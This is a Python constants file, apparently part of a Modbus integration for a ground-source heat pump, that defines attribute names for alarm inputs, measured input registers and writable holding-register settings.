ATTR_DINPUT_BRINE_IN_SENSOR_ALARM = "dinput_brine_in_sensor_alarm"
ATTR_DINPUT_BRINE_OUT_SENSOR_ALARM = "dinput_brine_out_sensor_alarm"
ATTR_DINPUT_CONDENSER_IN_SENSOR_ALARM = "dinput_condenser_in_sensor_alarm"
ATTR_DINPUT_CONDENSER_OUT_SENSOR_ALARM = "dinput_condenser_out_sensor_alarm"
ATTR_DINPUT_OUTDOOR_SENSOR_ALARM = "dinput_outdoor_sensor_alarm"
ATTR_DINPUT_SYSTEM_SUPPLY_LINE_SENSOR_ALARM = "dinput_system_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_1_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_1_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_2_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_2_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_3_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_3_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_4_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_4_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_5_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_5_supply_line_sensor_alarm"
ATTR_DINPUT_WCS_RETURN_LINE_SENSOR_ALARM = "dinput_wcs_return_line_sensor_alarm"
ATTR_DINPUT_TWC_SUPPLY_LINE_SENSOR_ALARM = "dinput_twc_supply_line_sensor_alarm"
ATTR_DINPUT_COOLING_TANK_SENSOR_ALARM = "dinput_cooling_tank_sensor_alarm"
ATTR_DINPUT_COOLING_SUPPLY_LINE_SENSOR_ALARM = "dinput_cooling_supply_line_sensor_alarm"
ATTR_DINPUT_COOLING_CIRCUIT_RETURN_LINE_SENSOR_ALARM = "dinput_cooling_circuit_return_line_sensor_alarm"
ATTR_DINPUT_BRINE_DELTA_OUT_OF_RANGE_ALARM = "dinput_brine_delta_out_of_range_alarm"
ATTR_DINPUT_TAP_WATER_MID_SENSOR_ALARM = "dinput_tap_water_mid_sensor_alarm"
ATTR_DINPUT_TWC_CIRCULATION_RETURN_SENSOR_ALARM = "dinput_twc_circulation_return_sensor_alarm"
ATTR_DINPUT_HGW_SENSOR_ALARM = "dinput_hgw_sensor_alarm"
ATTR_DINPUT_INTERNAL_ADDITIONAL_HEATER_ALARM = "dinput_internal_additional_heater_alarm"
ATTR_DINPUT_BRINE_IN_HIGH_TEMPERATURE_ALARM = "dinput_brine_in_high_temperature_alarm"
ATTR_DINPUT_BRINE_IN_LOW_TEMPERATURE_ALARM = "dinput_brine_in_low_temperature_alarm"
ATTR_DINPUT_BRINE_OUT_LOW_TEMPERATURE_ALARM = "dinput_brine_out_low_temperature_alarm"
ATTR_DINPUT_TWC_CIRCULATION_RETURN_LOW_TEMPERATURE_ALARM = "dinput_twc_circulation_return_low_temperature_alarm"
ATTR_DINPUT_TWC_SUPPLY_LOW_TEMPERATURE_ALARM = "dinput_twc_supply_low_temperature_alarm"
ATTR_DINPUT_MIX_VALVE_1_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_1_supply_temperature_deviation_alarm"
ATTR_DINPUT_MIX_VALVE_2_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_2_supply_temperature_deviation_alarm"
ATTR_DINPUT_MIX_VALVE_3_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_3_supply_temperature_deviation_alarm"
ATTR_DINPUT_MIX_VALVE_4_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_4_supply_temperature_deviation_alarm"
ATTR_DINPUT_MIX_VALVE_5_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_5_supply_temperature_deviation_alarm"
ATTR_DINPUT_WCS_RETURN_LINE_TEMPERATURE_DEVIATION_ALARM = "dinput_wcs_return_line_temperature_deviation_alarm"
ATTR_DINPUT_SUM_ALARM = "dinput_sum_alarm"
ATTR_DINPUT_COOLING_CIRCUIT_SUPPLY_LINE_TEMPERATURE_DEVIATION_ALARM = "dinput_cooling_circuit_supply_line_temperature_deviation_alarm"
ATTR_DINPUT_COOLING_TANK_TEMPERATURE_DEVIATION_ALARM = "dinput_cooling_tank_temperature_deviation_alarm"
ATTR_DINPUT_SURPLUS_HEAT_TEMPERATURE_DEVIATION_ALARM = "dinput_surplus_heat_temperature_deviation_alarm"
ATTR_DINPUT_HUMIDITY_ROOM_SENSOR_ALARM = "dinput_humidity_room_sensor_alarm"
ATTR_DINPUT_SURPLUS_HEAT_SUPPLY_LINE_SENSOR_ALARM = "dinput_surplus_heat_supply_line_sensor_alarm"
ATTR_DINPUT_SURPLUS_HEAT_RETURN_LINE_SENSOR_ALARM = "dinput_surplus_heat_return_line_sensor_alarm"
ATTR_DINPUT_COOLING_TANK_RETURN_LINE_SENSOR_ALARM = "dinput_cooling_tank_return_line_sensor_alarm"
ATTR_DINPUT_TEMPERATURE_ROOM_SENSOR_ALARM = "dinput_temperature_room_sensor_alarm"
ATTR_DINPUT_INVERTER_UNIT_COMMUNICATION_ALARM = "dinput_inverter_unit_communication_alarm"
ATTR_DINPUT_POOL_RETURN_LINE_SENSOR_ALARM = "dinput_pool_return_line_sensor_alarm"
ATTR_DINPUT_EXTERNAL_STOP_FOR_POOL = "dinput_external_stop_for_pool"
ATTR_DINPUT_EXTERNAL_START_BRINE_PUMP = "dinput_external_start_brine_pump"
ATTR_DINPUT_EXTERNAL_RELAY_FOR_BRINE_GROUND_WATER_PUMP = "dinput_external_relay_for_brine_ground_water_pump"
ATTR_DINPUT_TAP_WATER_END_TANK_SENSOR_ALARM = "dinput_tap_water_end_tank_sensor_alarm"
ATTR_DINPUT_MAXIMUM_TIME_FOR_ANTI_LEGIONELLA_EXCEEDED_ALARM = "dinput_maximum_time_for_anti_legionella_exceeded_alarm"
ATTR_DINPUT_GENESIS_SECONDARY_UNIT_ALARM = "dinput_genesis_secondary_unit_alarm"
ATTR_DINPUT_PRIMARY_UNIT_CONFLICT_ALARM = "dinput_primary_unit_conflict_alarm"
ATTR_DINPUT_PRIMARY_UNIT_NO_SECONDARY_ALARM = "dinput_primary_unit_no_secondary_alarm"
ATTR_DINPUT_OIL_BOOST_IN_PROGRESS = "dinput_oil_boost_in_progress"
ATTR_DINPUT_COMPRESSOR_CONTROL_SIGNAL = "dinput_compressor_control_signal"
ATTR_DINPUT_SMART_GRID_1 = "dinput_smart_grid_1"
ATTR_DINPUT_EXTERNAL_ALARM_INPUT = "dinput_external_alarm_input"
ATTR_DINPUT_SMART_GRID_2 = "dinput_smart_grid_2"
ATTR_DINPUT_EXTERNAL_ADDITIONAL_HEATER_CONTROL_SIGNAL = "dinput_external_additional_heater_control_signal"
ATTR_DINPUT_MIX_VALVE_1_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_mix_valve_1_circulation_pump_control_signal"
ATTR_DINPUT_CONDENSER_PUMP_ON_OFF_CONTROL = "dinput_condenser_pump_on_off_control"
ATTR_DINPUT_SYSTEM_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_system_circulation_pump_control_signal"
ATTR_DINPUT_HOT_GAS_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_hot_gas_circulation_pump_control_signal"
ATTR_DINPUT_BRINE_PUMP_ON_OFF_CONTROL = "dinput_brine_pump_on_off_control"
ATTR_DINPUT_EXTERNAL_HEATER_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_external_heater_circulation_pump_control_signal"
ATTR_DINPUT_HEATING_SEASON_ACTIVE = "dinput_heating_season_active"
ATTR_DINPUT_EXTERNAL_ADDITIONAL_HEATER_ACTIVE = "dinput_external_additional_heater_active"
ATTR_DINPUT_INTERNAL_ADDITIONAL_HEATER_ACTIVE = "dinput_internal_additional_heater_active"
ATTR_DINPUT_HGW_REGULATION_CONTROL_SIGNAL = "dinput_hgw_regulation_control_signal"
ATTR_DINPUT_HEAT_PUMP_STOPPING = "dinput_heat_pump_stopping"
ATTR_DINPUT_HEAT_PUMP_OK_TO_START = "dinput_heat_pump_ok_to_start"
ATTR_DINPUT_TWC_SUPPLY_LINE_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_twc_supply_line_circulation_pump_control_signal"
ATTR_DINPUT_WCS_REGULATION_CONTROL_SIGNAL = "dinput_wcs_regulation_control_signal"
ATTR_DINPUT_WCS_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_wcs_circulation_pump_control_signal"
ATTR_DINPUT_TWC_END_TANK_HEATER_CONTROL_SIGNAL = "dinput_twc_end_tank_heater_control_signal"
ATTR_DINPUT_POOL_DIRECTIONAL_VALVE_POSITION = "dinput_pool_directional_valve_position"
ATTR_DINPUT_COOLING_CIRCUIT_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_cooling_circuit_circulation_pump_control_signal"
ATTR_DINPUT_POOL_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_pool_circulation_pump_control_signal"
ATTR_DINPUT_SURPLUS_HEAT_DIRECTIONAL_VALVE_POSITION = "dinput_surplus_heat_directional_valve_position"
ATTR_DINPUT_SURPLUS_HEAT_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_surplus_heat_circulation_pump_control_signal"
ATTR_DINPUT_COOLING_CIRCUIT_REGULATION_CONTROL_SIGNAL = "dinput_cooling_circuit_regulation_control_signal"
ATTR_DINPUT_SURPLUS_HEAT_REGULATION_CONTROL_SIGNAL = "dinput_surplus_heat_regulation_control_signal"
ATTR_DINPUT_ACTIVE_COOLING_DIRECTIONAL_VALVE_POSITION = "dinput_active_cooling_directional_valve_position"
ATTR_DINPUT_PASSIVE_ACTIVE_COOLING_DIRECTIONAL_VALVE_POSITION = "dinput_passive_active_cooling_directional_valve_position"
ATTR_DINPUT_POOL_REGULATION_CONTROL_SIGNAL = "dinput_pool_regulation_control_signal"
ATTR_DINPUT_INDICATION_WHEN_MIXING_VALVE_1_IS_PRODUCING_PASSIVE_COOLING = "dinput_indication_when_mixing_valve_1_is_producing_passive_cooling"
ATTR_DINPUT_COMPRESSOR_IS_UNABLE_TO_SPEED_UP = "dinput_compressor_is_unable_to_speed_up"
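
# Attribute name constants for Modbus input registers (read-only measured
# values such as temperatures, pump speeds and operating hours).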
ATTR_INPUT_FIRST_PRIORITISED_DEMAND = "input_first_prioritised_demand"
ATTR_INPUT_COMPRESSOR_AVAILABLE_GEARS = "input_compressor_available_gears"
ATTR_INPUT_COMPRESSOR_SPEED_RPM = "input_compressor_speed_rpm"
ATTR_INPUT_EXTERNAL_ADDITIONAL_HEATER_CURRENT_DEMAND = "input_external_additional_heater_current_demand"
ATTR_INPUT_DISCHARGE_PIPE_TEMPERATURE = "input_discharge_pipe_temperature"
ATTR_INPUT_CONDENSER_IN_TEMPERATURE = "input_condenser_in_temperature"
ATTR_INPUT_CONDENSER_OUT_TEMPERATURE = "input_condenser_out_temperature"
ATTR_INPUT_BRINE_IN_TEMPERATURE = "input_brine_in_temperature"
ATTR_INPUT_BRINE_OUT_TEMPERATURE = "input_brine_out_temperature"
ATTR_INPUT_SYSTEM_SUPPLY_LINE_TEMPERATURE = "input_system_supply_line_temperature"
ATTR_INPUT_OUTDOOR_TEMPERATURE = "input_outdoor_temperature"
ATTR_INPUT_TAP_WATER_TOP_TEMPERATURE = "input_tap_water_top_temperature"
ATTR_INPUT_TAP_WATER_LOWER_TEMPERATURE = "input_tap_water_lower_temperature"
ATTR_INPUT_TAP_WATER_WEIGHTED_TEMPERATURE = "input_tap_water_weighted_temperature"
ATTR_INPUT_SYSTEM_SUPPLY_LINE_CALCULATED_SET_POINT = "input_system_supply_line_calculated_set_point"
ATTR_INPUT_SELECTED_HEAT_CURVE = "input_selected_heat_curve"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_1 = "input_heat_curve_x_coordinate_1"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_2 = "input_heat_curve_x_coordinate_2"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_3 = "input_heat_curve_x_coordinate_3"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_4 = "input_heat_curve_x_coordinate_4"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_5 = "input_heat_curve_x_coordinate_5"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_6 = "input_heat_curve_x_coordinate_6"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_7 = "input_heat_curve_x_coordinate_7"
ATTR_INPUT_COOLING_SEASON_INTEGRAL_VALUE = "input_cooling_season_integral_value"
ATTR_INPUT_CONDENSER_CIRCULATION_PUMP_SPEED = "input_condenser_circulation_pump_speed"
ATTR_INPUT_MIX_VALVE_1_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_1_supply_line_temperature"
ATTR_INPUT_BUFFER_TANK_TEMPERATURE = "input_buffer_tank_temperature"
ATTR_INPUT_MIX_VALVE_1_POSITION = "input_mix_valve_1_position"
ATTR_INPUT_BRINE_CIRCULATION_PUMP_SPEED = "input_brine_circulation_pump_speed"
ATTR_INPUT_HGW_SUPPLY_LINE_TEMPERATURE = "input_hgw_supply_line_temperature"
ATTR_INPUT_HOT_WATER_DIRECTIONAL_VALVE_POSITION = "input_hot_water_directional_valve_position"
ATTR_INPUT_COMPRESSOR_OPERATING_HOURS = "input_compressor_operating_hours"
ATTR_INPUT_TAP_WATER_OPERATING_HOURS = "input_tap_water_operating_hours"
ATTR_INPUT_EXTERNAL_ADDITIONAL_HEATER_OPERATING_HOURS = "input_external_additional_heater_operating_hours"
ATTR_INPUT_COMPRESSOR_SPEED_PERCENT = "input_compressor_speed_percent"
ATTR_INPUT_SECOND_PRIORITISED_DEMAND = "input_second_prioritised_demand"
ATTR_INPUT_THIRD_PRIORITISED_DEMAND = "input_third_prioritised_demand"
ATTR_INPUT_SOFTWARE_VERSION_MAJOR = "input_software_version_major"
ATTR_INPUT_SOFTWARE_VERSION_MINOR = "input_software_version_minor"
ATTR_INPUT_SOFTWARE_VERSION_MICRO = "input_software_version_micro"
ATTR_INPUT_COMPRESSOR_TEMPORARILY_BLOCKED = "input_compressor_temporarily_blocked"
ATTR_INPUT_COMPRESSOR_CURRENT_GEAR = "input_compressor_current_gear"
ATTR_INPUT_QUEUED_DEMAND_FIRST_PRIORITY = "input_queued_demand_first_priority"
ATTR_INPUT_QUEUED_DEMAND_SECOND_PRIORITY = "input_queued_demand_second_priority"
ATTR_INPUT_QUEUED_DEMAND_THIRD_PRIORITY = "input_queued_demand_third_priority"
ATTR_INPUT_QUEUED_DEMAND_FOURTH_PRIORITY = "input_queued_demand_fourth_priority"
ATTR_INPUT_QUEUED_DEMAND_FIFTH_PRIORITY = "input_queued_demand_fifth_priority"
ATTR_INPUT_INTERNAL_ADDITIONAL_HEATER_CURRENT_STEP = "input_internal_additional_heater_current_step"
ATTR_INPUT_BUFFER_TANK_CHARGE_SET_POINT = "input_buffer_tank_charge_set_point"
ATTR_INPUT_ELECTRIC_METER_L1_CURRENT = "input_electric_meter_l1_current"
ATTR_INPUT_ELECTRIC_METER_L2_CURRENT = "input_electric_meter_l2_current"
ATTR_INPUT_ELECTRIC_METER_L3_CURRENT = "input_electric_meter_l3_current"
ATTR_INPUT_ELECTRIC_METER_L1_0_VOLTAGE = "input_electric_meter_l1_0_voltage"
ATTR_INPUT_ELECTRIC_METER_L2_0_VOLTAGE = "input_electric_meter_l2_0_voltage"
ATTR_INPUT_ELECTRIC_METER_L3_0_VOLTAGE = "input_electric_meter_l3_0_voltage"
ATTR_INPUT_ELECTRIC_METER_L1_L2_VOLTAGE = "input_electric_meter_l1_l2_voltage"
ATTR_INPUT_ELECTRIC_METER_L2_L3_VOLTAGE = "input_electric_meter_l2_l3_voltage"
ATTR_INPUT_ELECTRIC_METER_L3_L1_VOLTAGE = "input_electric_meter_l3_l1_voltage"
ATTR_INPUT_ELECTRIC_METER_L1_POWER = "input_electric_meter_l1_power"
ATTR_INPUT_ELECTRIC_METER_L2_POWER = "input_electric_meter_l2_power"
ATTR_INPUT_ELECTRIC_METER_L3_POWER = "input_electric_meter_l3_power"
ATTR_INPUT_ELECTRIC_METER_METER_VALUE = "input_electric_meter_meter_value"
ATTR_INPUT_COMFORT_MODE = "input_comfort_mode"
ATTR_INPUT_ELECTRIC_METER_KWH_TOTAL = "input_electric_meter_kwh_total"
ATTR_INPUT_WCS_VALVE_POSITION = "input_wcs_valve_position"
ATTR_INPUT_TWC_VALVE_POSITION = "input_twc_valve_position"
ATTR_INPUT_MIX_VALVE_2_POSITION = "input_mix_valve_2_position"
ATTR_INPUT_MIX_VALVE_3_POSITION = "input_mix_valve_3_position"
ATTR_INPUT_MIX_VALVE_4_POSITION = "input_mix_valve_4_position"
ATTR_INPUT_MIX_VALVE_5_POSITION = "input_mix_valve_5_position"
ATTR_INPUT_DEW_POINT_ROOM = "input_dew_point_room"
ATTR_INPUT_COOLING_SUPPLY_LINE_MIX_VALVE_POSITION = "input_cooling_supply_line_mix_valve_position"
ATTR_INPUT_SURPLUS_HEAT_FAN_SPEED = "input_surplus_heat_fan_speed"
ATTR_INPUT_POOL_SUPPLY_LINE_MIX_VALVE_POSITION = "input_pool_supply_line_mix_valve_position"
ATTR_INPUT_TWC_SUPPLY_LINE_TEMPERATURE = "input_twc_supply_line_temperature"
ATTR_INPUT_TWC_RETURN_TEMPERATURE = "input_twc_return_temperature"
ATTR_INPUT_WCS_RETURN_LINE_TEMPERATURE = "input_wcs_return_line_temperature"
ATTR_INPUT_TWC_END_TANK_TEMPERATURE = "input_twc_end_tank_temperature"
ATTR_INPUT_MIX_VALVE_2_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_2_supply_line_temperature"
ATTR_INPUT_MIX_VALVE_3_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_3_supply_line_temperature"
ATTR_INPUT_MIX_VALVE_4_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_4_supply_line_temperature"
ATTR_INPUT_COOLING_CIRCUIT_RETURN_LINE_TEMPERATURE = "input_cooling_circuit_return_line_temperature"
ATTR_INPUT_COOLING_TANK_TEMPERATURE = "input_cooling_tank_temperature"
ATTR_INPUT_COOLING_TANK_RETURN_LINE_TEMPERATURE = "input_cooling_tank_return_line_temperature"
ATTR_INPUT_COOLING_CIRCUIT_SUPPLY_LINE_TEMPERATURE = "input_cooling_circuit_supply_line_temperature"
ATTR_INPUT_MIX_VALVE_5_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_5_supply_line_temperature"
ATTR_INPUT_MIX_VALVE_2_RETURN_LINE_TEMPERATURE = "input_mix_valve_2_return_line_temperature"
ATTR_INPUT_MIX_VALVE_3_RETURN_LINE_TEMPERATURE = "input_mix_valve_3_return_line_temperature"
ATTR_INPUT_MIX_VALVE_4_RETURN_LINE_TEMPERATURE = "input_mix_valve_4_return_line_temperature"
ATTR_INPUT_MIX_VALVE_5_RETURN_LINE_TEMPERATURE = "input_mix_valve_5_return_line_temperature"
ATTR_INPUT_SURPLUS_HEAT_RETURN_LINE_TEMPERATURE = "input_surplus_heat_return_line_temperature"
ATTR_INPUT_SURPLUS_HEAT_SUPPLY_LINE_TEMPERATURE = "input_surplus_heat_supply_line_temperature"
ATTR_INPUT_POOL_SUPPLY_LINE_TEMPERATURE = "input_pool_supply_line_temperature"
ATTR_INPUT_POOL_RETURN_LINE_TEMPERATURE = "input_pool_return_line_temperature"
ATTR_INPUT_ROOM_TEMPERATURE_SENSOR = "input_room_temperature_sensor"
ATTR_INPUT_BUBBLE_POINT = "input_bubble_point"
ATTR_INPUT_DEW_POINT = "input_dew_point"
ATTR_INPUT_SUPERHEAT_TEMPERATURE = "input_superheat_temperature"
ATTR_INPUT_SUB_COOLING_TEMPERATURE = "input_sub_cooling_temperature"
ATTR_INPUT_LOW_PRESSURE_SIDE = "input_low_pressure_side"
ATTR_INPUT_HIGH_PRESSURE_SIDE = "input_high_pressure_side"
ATTR_INPUT_LIQUID_LINE_TEMPERATURE = "input_liquid_line_temperature"
ATTR_INPUT_SUCTION_GAS_TEMPERATURE = "input_suction_gas_temperature"
ATTR_INPUT_HEATING_SEASON_INTEGRAL_VALUE = "input_heating_season_integral_value"
ATTR_INPUT_P_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION = "input_p_value_for_gear_shifting_and_demand_calculation"
ATTR_INPUT_I_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION = "input_i_value_for_gear_shifting_and_demand_calculation"
ATTR_INPUT_D_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION = "input_d_value_for_gear_shifting_and_demand_calculation"
ATTR_INPUT_I_VALUE_FOR_COMPRESSOR_ON_OFF_BUFFER_TANK = "input_i_value_for_compressor_on_off_buffer_tank"
ATTR_INPUT_P_VALUE_FOR_COMPRESSOR_ON_OFF_BUFFER_TANK = "input_p_value_for_compressor_on_off_buffer_tank"
ATTR_INPUT_MIX_VALVE_COOLING_OPENING_DEGREE = "input_mix_valve_cooling_opening_degree"
ATTR_INPUT_DESIRED_GEAR_FOR_TAP_WATER = "input_desired_gear_for_tap_water"
ATTR_INPUT_DESIRED_GEAR_FOR_HEATING = "input_desired_gear_for_heating"
ATTR_INPUT_DESIRED_GEAR_FOR_COOLING = "input_desired_gear_for_cooling"
ATTR_INPUT_DESIRED_GEAR_FOR_POOL = "input_desired_gear_for_pool"
ATTR_INPUT_NUMBER_OF_AVAILABLE_SECONDARIES_GENESIS = "input_number_of_available_secondaries_genesis"
ATTR_INPUT_NUMBER_OF_AVAILABLE_SECONDARIES_LEGACY = "input_number_of_available_secondaries_legacy"
ATTR_INPUT_TOTAL_DISTRIBUTED_GEARS_TO_ALL_UNITS = "input_total_distributed_gears_to_all_units"
ATTR_INPUT_MAXIMUM_GEAR_OUT_OF_ALL_THE_CURRENTLY_REQUESTED_GEARS = "input_maximum_gear_out_of_all_the_currently_requested_gears"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_1 = "input_desired_temperature_distribution_circuit_mix_valve_1"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_2 = "input_desired_temperature_distribution_circuit_mix_valve_2"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_3 = "input_desired_temperature_distribution_circuit_mix_valve_3"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_4 = "input_desired_temperature_distribution_circuit_mix_valve_4"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_5 = "input_desired_temperature_distribution_circuit_mix_valve_5"
ATTR_INPUT_DISCONNECT_HOT_GAS_END_TANK = "input_disconnect_hot_gas_end_tank"
ATTR_INPUT_LEGACY_HEAT_PUMP_COMPRESSOR_RUNNING = "input_legacy_heat_pump_compressor_running"
ATTR_INPUT_LEGACY_HEAT_PUMP_REPORTING_ALARM = "input_legacy_heat_pump_reporting_alarm"
ATTR_INPUT_LEGACY_HEAT_PUMP_START_SIGNAL = "input_legacy_heat_pump_start_signal"
ATTR_INPUT_LEGACY_HEAT_PUMP_TAP_WATER_SIGNAL = "input_legacy_heat_pump_tap_water_signal"
ATTR_INPUT_PRIMARY_UNIT_ALARM_COMBINED_OUTPUT_OF_ALL_CLASS_D_ALARMS = "input_primary_unit_alarm_combined_output_of_all_class_d_alarms"
ATTR_INPUT_PRIMARY_UNIT_ALARM_PRIMARY_UNIT_HAS_LOST_COMMUNICATION = "input_primary_unit_alarm_primary_unit_has_lost_communication"
ATTR_INPUT_PRIMARY_UNIT_ALARM_CLASS_A_ALARM_DETECTED_ON_THE_GENESIS_SECONDARY = "input_primary_unit_alarm_class_a_alarm_detected_on_the_genesis_secondary"
ATTR_INPUT_PRIMARY_UNIT_ALARM_CLASS_B_ALARM_DETECTED_ON_THE_GENESIS_SECONDARY = "input_primary_unit_alarm_class_b_alarm_detected_on_the_genesis_secondary"
ATTR_INPUT_PRIMARY_UNIT_ALARM_COMBINED_OUTPUT_OF_ALL_CLASS_E_ALARMS = "input_primary_unit_alarm_combined_output_of_all_class_e_alarms"
ATTR_INPUT_PRIMARY_UNIT_ALARM_GENERAL_LEGACY_HEAT_PUMP_ALARM = "input_primary_unit_alarm_general_legacy_heat_pump_alarm"
ATTR_INPUT_PRIMARY_UNIT_ALARM_PRIMARY_UNIT_CAN_NOT_COMMUNICATE_WITH_EXPANSION = "input_primary_unit_alarm_primary_unit_can_not_communicate_with_expansion"
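
# Attribute name constants for Modbus holding registers (read/write settings
# such as set points, heat curves and limits).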
ATTR_HOLDING_OPERATIONAL_MODE = "holding_operational_mode"
ATTR_HOLDING_MAX_LIMITATION = "holding_max_limitation"
ATTR_HOLDING_MIN_LIMITATION = "holding_min_limitation"
ATTR_HOLDING_COMFORT_WHEEL_SETTING = "holding_comfort_wheel_setting"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_1 = "holding_set_point_heat_curve_y_1"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_2 = "holding_set_point_heat_curve_y_2"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_3 = "holding_set_point_heat_curve_y_3"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_4 = "holding_set_point_heat_curve_y_4"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_5 = "holding_set_point_heat_curve_y_5"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_6 = "holding_set_point_heat_curve_y_6"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_7 = "holding_set_point_heat_curve_y_7"
ATTR_HOLDING_HEATING_SEASON_STOP_TEMPERATURE = "holding_heating_season_stop_temperature"
ATTR_HOLDING_START_TEMPERATURE_TAP_WATER = "holding_start_temperature_tap_water"
ATTR_HOLDING_STOP_TEMPERATURE_TAP_WATER = "holding_stop_temperature_tap_water"
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_HEATING = "holding_minimum_allowed_gear_in_heating"
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_HEATING = "holding_maximum_allowed_gear_in_heating"
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_TAP_WATER = "holding_maximum_allowed_gear_in_tap_water"
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_TAP_WATER = "holding_minimum_allowed_gear_in_tap_water"
ATTR_HOLDING_COOLING_MIX_VALVE_SET_POINT = "holding_cooling_mix_valve_set_point"
ATTR_HOLDING_TWC_MIX_VALVE_SET_POINT = "holding_twc_mix_valve_set_point"
ATTR_HOLDING_WCS_RETURN_LINE_SET_POINT = "holding_wcs_return_line_set_point"
ATTR_HOLDING_TWC_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE = "holding_twc_mix_valve_lowest_allowed_opening_degree"
ATTR_HOLDING_TWC_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_twc_mix_valve_highest_allowed_opening_degree"
ATTR_HOLDING_TWC_START_TEMPERATURE_IMMERSION_HEATER = "holding_twc_start_temperature_immersion_heater"
ATTR_HOLDING_TWC_START_DELAY_IMMERSION_HEATER = "holding_twc_start_delay_immersion_heater"
ATTR_HOLDING_TWC_STOP_TEMPERATURE_IMMERSION_HEATER = "holding_twc_stop_temperature_immersion_heater"
ATTR_HOLDING_WCS_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE = "holding_wcs_mix_valve_lowest_allowed_opening_degree"
ATTR_HOLDING_WCS_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_wcs_mix_valve_highest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_2_LOWEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_2_lowest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_2_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_2_highest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_3_LOWEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_3_lowest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_3_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_3_highest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_4_LOWEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_4_lowest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_4_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_4_highest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_5_LOWEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_5_lowest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_5_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_5_highest_allowed_opening_degree"
ATTR_HOLDING_SURPLUS_HEAT_CHILLER_SET_POINT = "holding_surplus_heat_chiller_set_point"
ATTR_HOLDING_COOLING_SUPPLY_LINE_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE = "holding_cooling_supply_line_mix_valve_lowest_allowed_opening_degree"
ATTR_HOLDING_COOLING_SUPPLY_LINE_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_cooling_supply_line_mix_valve_highest_allowed_opening_degree"
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STARTING_FAN_1 = "holding_surplus_heat_opening_degree_for_starting_fan_1"
